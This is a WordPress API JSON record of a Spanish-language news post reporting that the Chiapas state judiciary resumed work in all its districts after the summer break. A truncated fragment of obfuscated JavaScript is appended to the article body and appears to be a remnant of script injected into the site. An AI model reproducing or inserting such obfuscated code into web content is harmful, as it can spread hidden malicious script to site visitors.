{"id":16966,"date":"2024-08-02T02:26:03","date_gmt":"2024-08-02T02:26:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16966"},"modified":"2024-08-02T02:26:04","modified_gmt":"2024-08-02T02:26:04","slug":"reinicia-poder-judicial-actividades-en-todos-sus-distritos-judiciales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16966","title":{"rendered":"Reinicia Poder Judicial actividades en todos sus Distritos Judiciales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240719-WA0133-1024x771.jpg\" alt=\"\" class=\"wp-image-16967\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240719-WA0133-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240719-WA0133-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240719-WA0133-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240719-WA0133-1536x1157.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240719-WA0133-2048x1542.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>1 de agosto del 2024. Tuxtla Guti\u00e9rrez, Chiapas.\u2013 El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente Guillermo Ramos P\u00e9rez, retoma oficialmente sus actividades administrativas y jurisdiccionales en todos los Distritos Judiciales este 1 de agosto, tras concluir el periodo vacacional de verano establecido en el calendario oficial, por acuerdo del Pleno del Consejo de la Judicatura.<\/p>\n\n\n\n<p>El magistrado presidente expres\u00f3 su entusiasmo por el reinicio de labores, destacando la importancia de garantizar el acceso a la justicia para quienes acuden a esta casa de la justicia.<\/p>\n\n\n\n<p>&#8220;Nuestro compromiso con la justicia y el servicio a la ciudadan\u00eda es inquebrantable. Retomaremos nuestras actividades regulares con una gran energ\u00eda y dedicaci\u00f3n para seguir fortaleciendo el acceso a la justicia en todo el estado&#8221;, afirm\u00f3 Ramos P\u00e9rez.<\/p>\n\n\n\n<p>Adem\u00e1s, durante el periodo vacacional, el titular del Poder Judicial se mantuvo en constante trabajo en las Mesas de Seguridad encabezadas por el se\u00f1or Gobernador Constitucional Rutilio Escand\u00f3n Cadenas, desde la respetuosa independencia de Poderes. As\u00ed como en su agenda privada, asegurando la atenci\u00f3n continua de asuntos relevantes.<\/p>\n\n\n\n<p>El reinicio de actividades se realizar\u00e1 de forma inmediata, tras el periodo vacacional, con el objetivo de retomar las labores en todas las \u00e1reas, destacando la labor continua que se gener\u00f3 desde las guardias correspondientes para asuntos urgentes, manifestando el empe\u00f1o de toda la familia del Poder Judicial, en brindar un mejor servicio para las personas usuarias.<\/p>\n\n\n\n<p>Con ello, el Poder Judicial del Estado reafirma su trabajo constante para ofrecer un sistema de justicia pronta, completa e imparcial, de puertas abiertas y transparente para todas y todos los chiapanecos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 1 de agosto del 2024. Tuxtla Guti\u00e9rrez, Chiapas.\u2013 El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente Guillermo Ramos P\u00e9rez, retoma oficialmente sus actividades administrativas y jurisdiccionales en todos los Distritos Judiciales este 1 de agosto, tras concluir el periodo vacacional de verano establecido en el calendario oficial, por acuerdo del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16967,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-16966","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16966","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16966"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16966\/revisions"}],"predecessor-version":[{"id":16968,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16966\/revisions\/16968"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16967"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16966"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16966"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16966"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}